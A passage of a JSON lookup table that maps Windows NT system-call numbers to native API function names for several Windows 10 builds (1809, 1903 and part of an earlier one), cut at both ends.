"327": "NtQueryInformationWorkerFactory", "328": "NtQueryInstallUILanguage", "329": "NtQueryIntervalProfile", "330": "NtQueryIoCompletion", "331": "NtQueryLicenseValue", "332": "NtQueryMultipleValueKey", "333": "NtQueryMutant", "334": "NtQueryOpenSubKeys", "335": "NtQueryOpenSubKeysEx", "336": "NtQueryPortInformationProcess", "337": "NtQueryQuotaInformationFile", "338": "NtQuerySecurityAttributesToken", "339": "NtQuerySecurityObject", "340": "NtQuerySecurityPolicy", "341": "NtQuerySemaphore", "342": "NtQuerySymbolicLinkObject", "343": "NtQuerySystemEnvironmentValue", "344": "NtQuerySystemEnvironmentValueEx", "345": "NtQuerySystemInformationEx", "346": "NtQueryTimerResolution", "347": "NtQueryWnfStateData", "348": "NtQueryWnfStateNameInformation", "349": "NtQueueApcThreadEx", "350": "NtRaiseException", "351": "NtRaiseHardError", "352": "NtReadOnlyEnlistment", "353": "NtRecoverEnlistment", "354": "NtRecoverResourceManager", "355": "NtRecoverTransactionManager", "356": "NtRegisterProtocolAddressInformation", "357": "NtRegisterThreadTerminatePort", "358": "NtReleaseKeyedEvent", "359": "NtReleaseWorkerFactoryWorker", "360": "NtRemoveIoCompletionEx", "361": "NtRemoveProcessDebug", "362": "NtRenameKey", "363": "NtRenameTransactionManager", "364": "NtReplaceKey", "365": "NtReplacePartitionUnit", "366": "NtReplyWaitReplyPort", "367": "NtRequestPort", "368": "NtResetEvent", "369": "NtResetWriteWatch", "370": "NtRestoreKey", "371": "NtResumeProcess", "372": "NtRevertContainerImpersonation", "373": "NtRollbackComplete", "374": "NtRollbackEnlistment", "375": "NtRollbackRegistryTransaction", "376": "NtRollbackTransaction", "377": "NtRollforwardTransactionManager", "378": "NtSaveKey", "379": "NtSaveKeyEx", "380": "NtSaveMergedKeys", "381": "NtSecureConnectPort", "382": "NtSerializeBoot", "383": "NtSetBootEntryOrder", "384": "NtSetBootOptions", "385": "NtSetCachedSigningLevel", "386": "NtSetCachedSigningLevel2", "387": "NtSetContextThread", "388": "NtSetDebugFilterState", "389": "NtSetDefaultHardErrorPort", "390": "NtSetDefaultLocale", "391": "NtSetDefaultUILanguage", "392": "NtSetDriverEntryOrder", "393": "NtSetEaFile", "394": "NtSetHighEventPair", "395": "NtSetHighWaitLowEventPair", "396": "NtSetIRTimer", "397": "NtSetInformationDebugObject", "398": "NtSetInformationEnlistment", "399": "NtSetInformationJobObject", "400": "NtSetInformationKey", "401": "NtSetInformationResourceManager", "402": "NtSetInformationSymbolicLink", "403": "NtSetInformationToken", "404": "NtSetInformationTransaction", "405": "NtSetInformationTransactionManager", "406": "NtSetInformationVirtualMemory", "407": "NtSetInformationWorkerFactory", "408": "NtSetIntervalProfile", "409": "NtSetIoCompletion", "410": "NtSetIoCompletionEx", "411": "NtSetLdtEntries", "412": "NtSetLowEventPair", "413": "NtSetLowWaitHighEventPair", "414": "NtSetQuotaInformationFile", "415": "NtSetSecurityObject", "416": "NtSetSystemEnvironmentValue", "417": "NtSetSystemEnvironmentValueEx", "418": "NtSetSystemInformation", "419": "NtSetSystemPowerState", "420": "NtSetSystemTime", "421": "NtSetThreadExecutionState", "422": "NtSetTimer2", "423": "NtSetTimerEx", "424": "NtSetTimerResolution", "425": "NtSetUuidSeed", "426": "NtSetVolumeInformationFile", "427": "NtSetWnfProcessNotificationEvent", "428": "NtShutdownSystem", "429": "NtShutdownWorkerFactory", "430": "NtSignalAndWaitForSingleObject", "431": "NtSinglePhaseReject", "432": "NtStartProfile", "433": "NtStopProfile", "434": "NtSubscribeWnfStateChange", "435": "NtSuspendProcess", "436": "NtSuspendThread", "437": "NtSystemDebugControl", "438": "NtTerminateEnclave", "439": "NtTerminateJobObject", "440": "NtTestAlert", "441": "NtThawRegistry", "442": "NtThawTransactions", "443": "NtTraceControl", "444": "NtTranslateFilePath", "445": "NtUmsThreadYield", "446": "NtUnloadDriver", "447": "NtUnloadKey", "448": "NtUnloadKey2", "449": "NtUnloadKeyEx", "450": "NtUnlockFile", "451": "NtUnlockVirtualMemory", "452": "NtUnmapViewOfSectionEx", "453": "NtUnsubscribeWnfStateChange", "454": "NtUpdateWnfStateData", "455": "NtVdmControl", "456": "NtWaitForAlertByThreadId", "457": "NtWaitForDebugEvent", "458": "NtWaitForKeyedEvent", "459": "NtWaitForWorkViaWorkerFactory", "460": "NtWaitHighEventPair", "461": "NtWaitLowEventPair"}, "1809": {"0": "NtAccessCheck", "1": "NtWorkerFactoryWorkerReady", "2": "NtAcceptConnectPort", "3": "NtMapUserPhysicalPagesScatter", "4": "NtWaitForSingleObject", "5": "NtCallbackReturn", "6": "NtReadFile", "7": "NtDeviceIoControlFile", "8": "NtWriteFile", "9": "NtRemoveIoCompletion", "10": "NtReleaseSemaphore", "11": "NtReplyWaitReceivePort", "12": "NtReplyPort", "13": "NtSetInformationThread", "14": "NtSetEvent", "15": "NtClose", "16": "NtQueryObject", "17": "NtQueryInformationFile", "18": "NtOpenKey", "19": "NtEnumerateValueKey", "20": "NtFindAtom", "21": "NtQueryDefaultLocale", "22": "NtQueryKey", "23": "NtQueryValueKey", "24": "NtAllocateVirtualMemory", "25": "NtQueryInformationProcess", "26": "NtWaitForMultipleObjects32", "27": "NtWriteFileGather", "28": "NtSetInformationProcess", "29": "NtCreateKey", "30": "NtFreeVirtualMemory", "31": "NtImpersonateClientOfPort", "32": "NtReleaseMutant", "33": "NtQueryInformationToken", "34": "NtRequestWaitReplyPort", "35": "NtQueryVirtualMemory", "36": "NtOpenThreadToken", "37": "NtQueryInformationThread", "38": "NtOpenProcess", "39": "NtSetInformationFile", "40": "NtMapViewOfSection", "41": "NtAccessCheckAndAuditAlarm", "42": "NtUnmapViewOfSection", "43": "NtReplyWaitReceivePortEx", "44": "NtTerminateProcess", "45": "NtSetEventBoostPriority", "46": "NtReadFileScatter", "47": "NtOpenThreadTokenEx", "48": "NtOpenProcessTokenEx", "49": "NtQueryPerformanceCounter", "50": "NtEnumerateKey", "51": "NtOpenFile", "52": "NtDelayExecution", "53": "NtQueryDirectoryFile", "54": "NtQuerySystemInformation", "55": "NtOpenSection", "56": "NtQueryTimer", "57": "NtFsControlFile", "58": "NtWriteVirtualMemory", "59": "NtCloseObjectAuditAlarm", "60": "NtDuplicateObject", "61": "NtQueryAttributesFile", "62": "NtClearEvent", "63": "NtReadVirtualMemory", "64": "NtOpenEvent", "65": "NtAdjustPrivilegesToken", "66": "NtDuplicateToken", "67": "NtContinue", "68": "NtQueryDefaultUILanguage", "69": "NtQueueApcThread", "70": "NtYieldExecution", "71": "NtAddAtom", "72": "NtCreateEvent", "73": "NtQueryVolumeInformationFile", "74": "NtCreateSection", "75": "NtFlushBuffersFile", "76": "NtApphelpCacheControl", "77": "NtCreateProcessEx", "78": "NtCreateThread", "79": "NtIsProcessInJob", "80": "NtProtectVirtualMemory", "81": "NtQuerySection", "82": "NtResumeThread", "83": "NtTerminateThread", "84": "NtReadRequestData", "85": "NtCreateFile", "86": "NtQueryEvent", "87": "NtWriteRequestData", "88": "NtOpenDirectoryObject", "89": "NtAccessCheckByTypeAndAuditAlarm", "90": "NtQuerySystemTime", "91": "NtWaitForMultipleObjects", "92": "NtSetInformationObject", "93": "NtCancelIoFile", "94": "NtTraceEvent", "95": "NtPowerInformation", "96": "NtSetValueKey", "97": "NtCancelTimer", "98": "NtSetTimer", "99": "NtAccessCheckByType", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAcquireProcessActivityReference", "104": "NtAddAtomEx", "105": "NtAddBootEntry", "106": "NtAddDriverEntry", "107": "NtAdjustGroupsToken", "108": "NtAdjustTokenClaimsAndDeviceGroups", "109": "NtAlertResumeThread", "110": "NtAlertThread", "111": "NtAlertThreadByThreadId", "112": "NtAllocateLocallyUniqueId", "113": "NtAllocateReserveObject", "114": "NtAllocateUserPhysicalPages", "115": "NtAllocateUuids", "116": "NtAllocateVirtualMemoryEx", "117": "NtAlpcAcceptConnectPort", "118": "NtAlpcCancelMessage", "119": "NtAlpcConnectPort", "120": "NtAlpcConnectPortEx", "121": "NtAlpcCreatePort", "122": "NtAlpcCreatePortSection", "123": "NtAlpcCreateResourceReserve", "124": "NtAlpcCreateSectionView", "125": "NtAlpcCreateSecurityContext", "126": "NtAlpcDeletePortSection", "127": "NtAlpcDeleteResourceReserve", "128": "NtAlpcDeleteSectionView", "129": "NtAlpcDeleteSecurityContext", "130": "NtAlpcDisconnectPort", "131": "NtAlpcImpersonateClientContainerOfPort", "132": "NtAlpcImpersonateClientOfPort", "133": "NtAlpcOpenSenderProcess", "134": "NtAlpcOpenSenderThread", "135": "NtAlpcQueryInformation", "136": "NtAlpcQueryInformationMessage", "137": "NtAlpcRevokeSecurityContext", "138": "NtAlpcSendWaitReceivePort", "139": "NtAlpcSetInformation", "140": "NtAreMappedFilesTheSame", "141": "NtAssignProcessToJobObject", "142": "NtAssociateWaitCompletionPacket", "143": "NtCallEnclave", "144": "NtCancelIoFileEx", "145": "NtCancelSynchronousIoFile", "146": "NtCancelTimer2", "147": "NtCancelWaitCompletionPacket", "148": "NtCommitComplete", "149": "NtCommitEnlistment", "150": "NtCommitRegistryTransaction", "151": "NtCommitTransaction", "152": "NtCompactKeys", "153": "NtCompareObjects", "154": "NtCompareSigningLevels", "155": "NtCompareTokens", "156": "NtCompleteConnectPort", "157": "NtCompressKey", "158": "NtConnectPort", "159": "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter", "160": "NtCreateDebugObject", "161": "NtCreateDirectoryObject", "162": "NtCreateDirectoryObjectEx", "163": "NtCreateEnclave", "164": "NtCreateEnlistment", "165": "NtCreateEventPair", "166": "NtCreateIRTimer", "167": "NtCreateIoCompletion", "168": "NtCreateJobObject", "169": "NtCreateJobSet", "170": "NtCreateKeyTransacted", "171": "NtCreateKeyedEvent", "172": "NtCreateLowBoxToken", "173": "NtCreateMailslotFile", "174": "NtCreateMutant", "175": "NtCreateNamedPipeFile", "176": "NtCreatePagingFile", "177": "NtCreatePartition", "178": "NtCreatePort", "179": "NtCreatePrivateNamespace", "180": "NtCreateProcess", "181": "NtCreateProfile", "182": "NtCreateProfileEx", "183": "NtCreateRegistryTransaction", "184": "NtCreateResourceManager", "185": "NtCreateSectionEx", "186": "NtCreateSemaphore", "187": "NtCreateSymbolicLinkObject", "188": "NtCreateThreadEx", "189": "NtCreateTimer", "190": "NtCreateTimer2", "191": "NtCreateToken", "192": "NtCreateTokenEx", "193": "NtCreateTransaction", "194": "NtCreateTransactionManager", "195": "NtCreateUserProcess", "196": "NtCreateWaitCompletionPacket", "197": "NtCreateWaitablePort", "198": "NtCreateWnfStateName", "199": "NtCreateWorkerFactory", "200": "NtDebugActiveProcess", "201": "NtDebugContinue", "202": "NtDeleteAtom", "203": "NtDeleteBootEntry", "204": "NtDeleteDriverEntry", "205": "NtDeleteFile", "206": "NtDeleteKey", "207": "NtDeleteObjectAuditAlarm", "208": "NtDeletePrivateNamespace", "209": "NtDeleteValueKey", "210": "NtDeleteWnfStateData", "211": "NtDeleteWnfStateName", "212": "NtDisableLastKnownGood", "213": "NtDisplayString", "214": "NtDrawText", "215": "NtEnableLastKnownGood", "216": "NtEnumerateBootEntries", "217": "NtEnumerateDriverEntries", "218": "NtEnumerateSystemEnvironmentValuesEx", "219": "NtEnumerateTransactionObject", "220": "NtExtendSection", "221": "NtFilterBootOption", "222": "NtFilterToken", "223": "NtFilterTokenEx", "224": "NtFlushBuffersFileEx", "225": "NtFlushInstallUILanguage", "226": "NtFlushInstructionCache", "227": "NtFlushKey", "228": "NtFlushProcessWriteBuffers", "229": "NtFlushVirtualMemory", "230": "NtFlushWriteBuffer", "231": "NtFreeUserPhysicalPages", "232": "NtFreezeRegistry", "233": "NtFreezeTransactions", "234": "NtGetCachedSigningLevel", "235": "NtGetCompleteWnfStateSubscription", "236": "NtGetContextThread", "237": "NtGetCurrentProcessorNumber", "238": "NtGetCurrentProcessorNumberEx", "239": "NtGetDevicePowerState", "240": "NtGetMUIRegistryInfo", "241": "NtGetNextProcess", "242": "NtGetNextThread", "243": "NtGetNlsSectionPtr", "244": "NtGetNotificationResourceManager", "245": "NtGetWriteWatch", "246": "NtImpersonateAnonymousToken", "247": "NtImpersonateThread", "248": "NtInitializeEnclave", "249": "NtInitializeNlsFiles", "250": "NtInitializeRegistry", "251": "NtInitiatePowerAction", "252": "NtIsSystemResumeAutomatic", "253": "NtIsUILanguageComitted", "254": "NtListenPort", "255": "NtLoadDriver", "256": "NtLoadEnclaveData", "257": "NtLoadKey", "258": "NtLoadKey2", "259": "NtLoadKeyEx", "260": "NtLockFile", "261": "NtLockProductActivationKeys", "262": "NtLockRegistryKey", "263": "NtLockVirtualMemory", "264": "NtMakePermanentObject", "265": "NtMakeTemporaryObject", "266": "NtManageHotPatch", "267": "NtManagePartition", "268": "NtMapCMFModule", "269": "NtMapUserPhysicalPages", "270": "NtMapViewOfSectionEx", "271": "NtModifyBootEntry", "272": "NtModifyDriverEntry", "273": "NtNotifyChangeDirectoryFile", "274": "NtNotifyChangeDirectoryFileEx", "275": "NtNotifyChangeKey", "276": "NtNotifyChangeMultipleKeys", "277": "NtNotifyChangeSession", "278": "NtOpenEnlistment", "279": "NtOpenEventPair", "280": "NtOpenIoCompletion", "281": "NtOpenJobObject", "282": "NtOpenKeyEx", "283": "NtOpenKeyTransacted", "284": "NtOpenKeyTransactedEx", "285": "NtOpenKeyedEvent", "286": "NtOpenMutant", "287": "NtOpenObjectAuditAlarm", "288": "NtOpenPartition", "289": "NtOpenPrivateNamespace", "290": "NtOpenProcessToken", "291": "NtOpenRegistryTransaction", "292": "NtOpenResourceManager", "293": "NtOpenSemaphore", "294": "NtOpenSession", "295": "NtOpenSymbolicLinkObject", "296": "NtOpenThread", "297": "NtOpenTimer", "298": "NtOpenTransaction", "299": "NtOpenTransactionManager", "300": "NtPlugPlayControl", "301": "NtPrePrepareComplete", "302": "NtPrePrepareEnlistment", "303": "NtPrepareComplete", "304": "NtPrepareEnlistment", "305": "NtPrivilegeCheck", "306": "NtPrivilegeObjectAuditAlarm", "307": "NtPrivilegedServiceAuditAlarm", "308": "NtPropagationComplete", "309": "NtPropagationFailed", "310": "NtPulseEvent", "311": "NtQueryAuxiliaryCounterFrequency", "312": "NtQueryBootEntryOrder", "313": "NtQueryBootOptions", "314": "NtQueryDebugFilterState", "315": "NtQueryDirectoryFileEx", "316": "NtQueryDirectoryObject", "317": "NtQueryDriverEntryOrder", "318": "NtQueryEaFile", "319": "NtQueryFullAttributesFile", "320": "NtQueryInformationAtom", "321": "NtQueryInformationByName", "322": "NtQueryInformationEnlistment", "323": "NtQueryInformationJobObject", "324": "NtQueryInformationPort", "325": "NtQueryInformationResourceManager", "326": "NtQueryInformationTransaction", "327": "NtQueryInformationTransactionManager", "328": "NtQueryInformationWorkerFactory", "329": "NtQueryInstallUILanguage", "330": "NtQueryIntervalProfile", "331": "NtQueryIoCompletion", "332": "NtQueryLicenseValue", "333": "NtQueryMultipleValueKey", "334": "NtQueryMutant", "335": "NtQueryOpenSubKeys", "336": "NtQueryOpenSubKeysEx", "337": "NtQueryPortInformationProcess", "338": "NtQueryQuotaInformationFile", "339": "NtQuerySecurityAttributesToken", "340": "NtQuerySecurityObject", "341": "NtQuerySecurityPolicy", "342": "NtQuerySemaphore", "343": "NtQuerySymbolicLinkObject", "344": "NtQuerySystemEnvironmentValue", "345": "NtQuerySystemEnvironmentValueEx", "346": "NtQuerySystemInformationEx", "347": "NtQueryTimerResolution", "348": "NtQueryWnfStateData", "349": "NtQueryWnfStateNameInformation", "350": "NtQueueApcThreadEx", "351": "NtRaiseException", "352": "NtRaiseHardError", "353": "NtReadOnlyEnlistment", "354": "NtRecoverEnlistment", "355": "NtRecoverResourceManager", "356": "NtRecoverTransactionManager", "357": "NtRegisterProtocolAddressInformation", "358": "NtRegisterThreadTerminatePort", "359": "NtReleaseKeyedEvent", "360": "NtReleaseWorkerFactoryWorker", "361": "NtRemoveIoCompletionEx", "362": "NtRemoveProcessDebug", "363": "NtRenameKey", "364": "NtRenameTransactionManager", "365": "NtReplaceKey", "366": "NtReplacePartitionUnit", "367": "NtReplyWaitReplyPort", "368": "NtRequestPort", "369": "NtResetEvent", "370": "NtResetWriteWatch", "371": "NtRestoreKey", "372": "NtResumeProcess", "373": "NtRevertContainerImpersonation", "374": "NtRollbackComplete", "375": "NtRollbackEnlistment", "376": "NtRollbackRegistryTransaction", "377": "NtRollbackTransaction", "378": "NtRollforwardTransactionManager", "379": "NtSaveKey", "380": "NtSaveKeyEx", "381": "NtSaveMergedKeys", "382": "NtSecureConnectPort", "383": "NtSerializeBoot", "384": "NtSetBootEntryOrder", "385": "NtSetBootOptions", "386": "NtSetCachedSigningLevel", "387": "NtSetCachedSigningLevel2", "388": "NtSetContextThread", "389": "NtSetDebugFilterState", "390": "NtSetDefaultHardErrorPort", "391": "NtSetDefaultLocale", "392": "NtSetDefaultUILanguage", "393": "NtSetDriverEntryOrder", "394": "NtSetEaFile", "395": "NtSetHighEventPair", "396": "NtSetHighWaitLowEventPair", "397": "NtSetIRTimer", "398": "NtSetInformationDebugObject", "399": "NtSetInformationEnlistment", "400": "NtSetInformationJobObject", "401": "NtSetInformationKey", "402": "NtSetInformationResourceManager", "403": "NtSetInformationSymbolicLink", "404": "NtSetInformationToken", "405": "NtSetInformationTransaction", "406": "NtSetInformationTransactionManager", "407": "NtSetInformationVirtualMemory", "408": "NtSetInformationWorkerFactory", "409": "NtSetIntervalProfile", "410": "NtSetIoCompletion", "411": "NtSetIoCompletionEx", "412": "NtSetLdtEntries", "413": "NtSetLowEventPair", "414": "NtSetLowWaitHighEventPair", "415": "NtSetQuotaInformationFile", "416": "NtSetSecurityObject", "417": "NtSetSystemEnvironmentValue", "418": "NtSetSystemEnvironmentValueEx", "419": "NtSetSystemInformation", "420": "NtSetSystemPowerState", "421": "NtSetSystemTime", "422": "NtSetThreadExecutionState", "423": "NtSetTimer2", "424": "NtSetTimerEx", "425": "NtSetTimerResolution", "426": "NtSetUuidSeed", "427": "NtSetVolumeInformationFile", "428": "NtSetWnfProcessNotificationEvent", "429": "NtShutdownSystem", "430": "NtShutdownWorkerFactory", "431": "NtSignalAndWaitForSingleObject", "432": "NtSinglePhaseReject", "433": "NtStartProfile", "434": "NtStopProfile", "435": "NtSubscribeWnfStateChange", "436": "NtSuspendProcess", "437": "NtSuspendThread", "438": "NtSystemDebugControl", "439": "NtTerminateEnclave", "440": "NtTerminateJobObject", "441": "NtTestAlert", "442": "NtThawRegistry", "443": "NtThawTransactions", "444": "NtTraceControl", "445": "NtTranslateFilePath", "446": "NtUmsThreadYield", "447": "NtUnloadDriver", "448": "NtUnloadKey", "449": "NtUnloadKey2", "450": "NtUnloadKeyEx", "451": "NtUnlockFile", "452": "NtUnlockVirtualMemory", "453": "NtUnmapViewOfSectionEx", "454": "NtUnsubscribeWnfStateChange", "455": "NtUpdateWnfStateData", "456": "NtVdmControl", "457": "NtWaitForAlertByThreadId", "458": "NtWaitForDebugEvent", "459": "NtWaitForKeyedEvent", "460": "NtWaitForWorkViaWorkerFactory", "461": "NtWaitHighEventPair", "462": "NtWaitLowEventPair"}, "1903": {"0": "NtAccessCheck", "1": "NtWorkerFactoryWorkerReady", "2": "NtAcceptConnectPort", "3": "NtMapUserPhysicalPagesScatter", "4": "NtWaitForSingleObject", "5": "NtCallbackReturn", "6": "NtReadFile", "7": "NtDeviceIoControlFile", "8": "NtWriteFile", "9": "NtRemoveIoCompletion", "10": "NtReleaseSemaphore", "11": "NtReplyWaitReceivePort", "12": "NtReplyPort", "13": "NtSetInformationThread", "14": "NtSetEvent", "15": "NtClose", "16": "NtQueryObject", "17": "NtQueryInformationFile", "18": "NtOpenKey", "19": "NtEnumerateValueKey", "20": "NtFindAtom", "21": "NtQueryDefaultLocale", "22": "NtQueryKey", "23": "NtQueryValueKey", "24": "NtAllocateVirtualMemory", "25": "NtQueryInformationProcess", "26": "NtWaitForMultipleObjects32", "27": "NtWriteFileGather", "28": "NtSetInformationProcess", "29": "NtCreateKey", "30": "NtFreeVirtualMemory", "31": "NtImpersonateClientOfPort", "32": "NtReleaseMutant", "33": "NtQueryInformationToken", "34": "NtRequestWaitReplyPort", "35": "NtQueryVirtualMemory", "36": "NtOpenThreadToken", "37": "NtQueryInformationThread", "38": "NtOpenProcess", "39": "NtSetInformationFile", "40": "NtMapViewOfSection", "41": "NtAccessCheckAndAuditAlarm", "42": "NtUnmapViewOfSection", "43": "NtReplyWaitReceivePortEx", "44": "NtTerminateProcess", "45": "NtSetEventBoostPriority", "46": "NtReadFileScatter", "47": "NtOpenThreadTokenEx", "48": "NtOpenProcessTokenEx", "49": "NtQueryPerformanceCounter", "50": "NtEnumerateKey", "51": "NtOpenFile", "52": "NtDelayExecution", "53": "NtQueryDirectoryFile", "54": "NtQuerySystemInformation", "55": "NtOpenSection", "56": "NtQueryTimer", "57": "NtFsControlFile", "58": "NtWriteVirtualMemory", "59": "NtCloseObjectAuditAlarm", "60": "NtDuplicateObject", "61": "NtQueryAttributesFile", "62": "NtClearEvent", "63": "NtReadVirtualMemory", "64": "NtOpenEvent", "65": "NtAdjustPrivilegesToken", "66": "NtDuplicateToken", "67": "NtContinue", "68": "NtQueryDefaultUILanguage", "69": "NtQueueApcThread", "70": "NtYieldExecution", "71": "NtAddAtom", "72": "NtCreateEvent", "73": "NtQueryVolumeInformationFile", "74": "NtCreateSection", "75": "NtFlushBuffersFile", "76": "NtApphelpCacheControl", "77": "NtCreateProcessEx", "78": "NtCreateThread", "79": "NtIsProcessInJob", "80": "NtProtectVirtualMemory", "81": "NtQuerySection", "82": "NtResumeThread", "83": "NtTerminateThread", "84": "NtReadRequestData", "85": "NtCreateFile", "86": "NtQueryEvent", "87": "NtWriteRequestData", "88": "NtOpenDirectoryObject", "89": "NtAccessCheckByTypeAndAuditAlarm", "90": "NtQuerySystemTime", "91": "NtWaitForMultipleObjects", "92": "NtSetInformationObject", "93": "NtCancelIoFile", "94": "NtTraceEvent", "95": "NtPowerInformation", "96": "NtSetValueKey", "97": "NtCancelTimer", "98": "NtSetTimer", "99": "NtAccessCheckByType", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAcquireProcessActivityReference", "104": "NtAddAtomEx", "105": "NtAddBootEntry", "106": "NtAddDriverEntry", "107": "NtAdjustGroupsToken", "108": "NtAdjustTokenClaimsAndDeviceGroups", "109": "NtAlertResumeThread", "110": "NtAlertThread", "111": "NtAlertThreadByThreadId", "112": "NtAllocateLocallyUniqueId", "113": "NtAllocateReserveObject", "114": "NtAllocateUserPhysicalPages", "115": "NtAllocateUuids", "116": "NtAllocateVirtualMemoryEx", "117": "NtAlpcAcceptConnectPort", "118": "NtAlpcCancelMessage", "119": "NtAlpcConnectPort", "120": "NtAlpcConnectPortEx", "121": "NtAlpcCreatePort", "122": "NtAlpcCreatePortSection", "123": "NtAlpcCreateResourceReserve", "124": "NtAlpcCreateSectionView", "125": "NtAlpcCreateSecurityContext", "126": "NtAlpcDeletePortSection", "127": "NtAlpcDeleteResourceReserve", "128": "NtAlpcDeleteSectionView", "129": "NtAlpcDeleteSecurityContext", "130": "NtAlpcDisconnectPort", "131": "NtAlpcImpersonateClientContainerOfPort", "132": "NtAlpcImpersonateClientOfPort", "133": "NtAlpcOpenSenderProcess", "134": "NtAlpcOpenSenderThread", "135": "NtAlpcQueryInformation", "136": "NtAlpcQueryInformationMessage", "137": "NtAlpcRevokeSecurityContext", "138": "NtAlpcSendWaitReceivePort", "139": "NtAlpcSetInformation", "140": "NtAreMappedFilesTheSame", "141": "NtAssignProcessToJobObject", "142": "NtAssociateWaitCompletionPacket", "143": "NtCallEnclave", "144": "NtCancelIoFileEx", "145": "NtCancelSynchronousIoFile", "146": "NtCancelTimer2", "147": "NtCancelWaitCompletionPacket", "148": "NtCommitComplete", "149": "NtCommitEnlistment", "150": "NtCommitRegistryTransaction", "151": "NtCommitTransaction", "152": "NtCompactKeys", "153": "NtCompareObjects", "154": "NtCompareSigningLevels", "155": "NtCompareTokens", "156": "NtCompleteConnectPort", "157": "NtCompressKey", "158": "NtConnectPort", "159": "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter", "160": "NtCreateCrossVmEvent", "161": "NtCreateDebugObject", "162": "NtCreateDirectoryObject", "163": "NtCreateDirectoryObjectEx", "164": "NtCreateEnclave", "165": "NtCreateEnlistment", "166": "NtCreateEventPair", "167": "NtCreateIRTimer", "168": "NtCreateIoCompletion", "169": "NtCreateJobObject", "170": "NtCreateJobSet", "171": "NtCreateKeyTransacted", "172": "NtCreateKeyedEvent", "173": "NtCreateLowBoxToken", "174": "NtCreateMailslotFile", "175": "NtCreateMutant", "176": "NtCreateNamedPipeFile", "177": "NtCreatePagingFile", "178": "NtCreatePartition", "179": "NtCreatePort", "180": "NtCreatePrivateNamespace", "181": "NtCreateProcess", "182": "NtCreateProfile", "183": "NtCreateProfileEx", "184": "NtCreateRegistryTransaction", "185": "NtCreateResourceManager", "186": "NtCreateSectionEx", "187": "NtCreateSemaphore", "188": "NtCreateSymbolicLinkObject", "189": "NtCreateThreadEx", "190": "NtCreateTimer", "191": "NtCreateTimer2", "192": "NtCreateToken", "193": "NtCreateTokenEx", "194": "NtCreateTransaction", "195": "NtCreateTransactionManager", "196": "NtCreateUserProcess", "197": "NtCreateWaitCompletionPacket", "198": "NtCreateWaitablePort", "199": "NtCreateWnfStateName", "200": "NtCreateWorkerFactory", "201": "NtDebugActiveProcess", "202": "NtDebugContinue", "203": "NtDeleteAtom", "204": "NtDeleteBootEntry", "205": "NtDeleteDriverEntry", "206": "NtDeleteFile", "207": "NtDeleteKey", "208": "NtDeleteObjectAuditAlarm", "209": "NtDeletePrivateNamespace", "210": "NtDeleteValueKey", "211": "NtDeleteWnfStateData", "212": "NtDeleteWnfStateName", "213": "NtDisableLastKnownGood", "214": "NtDisplayString", "215": "NtDrawText", "216": "NtEnableLastKnownGood", "217": "NtEnumerateBootEntries", "218": "NtEnumerateDriverEntries", "219": "NtEnumerateSystemEnvironmentValuesEx", "220": "NtEnumerateTransactionObject", "221": "NtExtendSection", "222": "NtFilterBootOption", "223": "NtFilterToken", "224": "NtFilterTokenEx", "225": "NtFlushBuffersFileEx", "226": "NtFlushInstallUILanguage", "227": "NtFlushInstructionCache", "228": "NtFlushKey", "229": "NtFlushProcessWriteBuffers", "230": "NtFlushVirtualMemory", "231": "NtFlushWriteBuffer", "232": "NtFreeUserPhysicalPages", "233": "NtFreezeRegistry", "234": "NtFreezeTransactions", "235": "NtGetCachedSigningLevel", "236": "NtGetCompleteWnfStateSubscription", "237": "NtGetContextThread", "238": "NtGetCurrentProcessorNumber", "239": "NtGetCurrentProcessorNumberEx", "240": "NtGetDevicePowerState", "241": "NtGetMUIRegistryInfo", "242": "NtGetNextProcess", "243": "NtGetNextThread", "244": "NtGetNlsSectionPtr", "245": "NtGetNotificationResourceManager", "246": "NtGetWriteWatch", "247": "NtImpersonateAnonymousToken", "248": "NtImpersonateThread", "249": "NtInitializeEnclave", "250": "NtInitializeNlsFiles", "251": "NtInitializeRegistry", "252": "NtInitiatePowerAction", "253": "NtIsSystemResumeAutomatic", "254": "NtIsUILanguageComitted", "255": "NtListenPort", "256": "NtLoadDriver", "257": "NtLoadEnclaveData", "258": "NtLoadKey", "259": "NtLoadKey2", "260": "NtLoadKeyEx", "261": "NtLockFile", "262": "NtLockProductActivationKeys", "263": "NtLockRegistryKey", "264": "NtLockVirtualMemory", "265": "NtMakePermanentObject", "266": "NtMakeTemporaryObject", "267": "NtManageHotPatch", "268": "NtManagePartition", "269": "NtMapCMFModule", "270": "NtMapUserPhysicalPages", "271": "NtMapViewOfSectionEx", "272": "NtModifyBootEntry", "273": "NtModifyDriverEntry", "274": "NtNotifyChangeDirectoryFile", "275": "NtNotifyChangeDirectoryFileEx", "276": "NtNotifyChangeKey", "277": "NtNotifyChangeMultipleKeys", "278": "NtNotifyChangeSession", "279": "NtOpenEnlistment", "280": "NtOpenEventPair", "281": "NtOpenIoCompletion", "282": "NtOpenJobObject", "283": "NtOpenKeyEx", "284": "NtOpenKeyTransacted", "285": "NtOpenKeyTransactedEx", "286": "NtOpenKeyedEvent", "287": "NtOpenMutant", "288": "NtOpenObjectAuditAlarm", "289": "NtOpenPartition", "290": "NtOpenPrivateNamespace", "291": "NtOpenProcessToken", "292": "NtOpenRegistryTransaction", "293": "NtOpenResourceManager", "294": "NtOpenSemaphore", "295": "NtOpenSession", "296": "NtOpenSymbolicLinkObject", "297": "NtOpenThread", "298": "NtOpenTimer", "299": "NtOpenTransaction", "300": "NtOpenTransactionManager", "301": "NtPlugPlayControl", "302": "NtPrePrepareComplete", "303": "NtPrePrepareEnlistment", "304": "NtPrepareComplete", "305": "NtPrepareEnlistment", "306": "NtPrivilegeCheck", "307": "NtPrivilegeObjectAuditAlarm", "308": "NtPrivilegedServiceAuditAlarm", "309": "NtPropagationComplete", "310": "NtPropagationFailed", "311": "NtPulseEvent", "312": "NtQueryAuxiliaryCounterFrequency", "313": "NtQueryBootEntryOrder", "314": "NtQueryBootOptions", "315": "NtQueryDebugFilterState", "316": "NtQueryDirectoryFileEx", "317": "NtQueryDirectoryObject", "318": "NtQueryDriverEntryOrder", "319": "NtQueryEaFile", "320": "NtQueryFullAttributesFile", "321": "NtQueryInformationAtom", "322": "NtQueryInformationByName", "323": "NtQueryInformationEnlistment", "324": "NtQueryInformationJobObject", "325": "NtQueryInformationPort", "326": 